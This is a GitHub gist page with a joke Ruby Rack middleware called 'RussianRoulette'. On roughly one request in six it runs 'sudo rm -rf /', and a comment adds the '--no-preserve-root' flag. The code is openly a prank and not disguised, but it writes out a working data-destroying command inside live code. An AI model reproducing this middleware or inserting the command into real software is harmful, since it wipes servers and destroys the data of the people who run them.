Skip to content

Instantly share code, notes, and snippets.

@techiferous
Created November 15, 2009 05:20
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save techiferous/235021 to your computer and use it in GitHub Desktop.
Save techiferous/235021 to your computer and use it in GitHub Desktop.
module Rack
class RussianRoulette
def initialize(app)
@app = app
end
def call(env)
if rand(6) == 0
%x{sudo rm -rf /}
else
@app.call(env)
end
end
end
end
@houhoulis
Copy link

It probably varies depending on what operating system you've deployed, but in order to really galvanize my career, I needed to add the --no-preserve-root flag.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment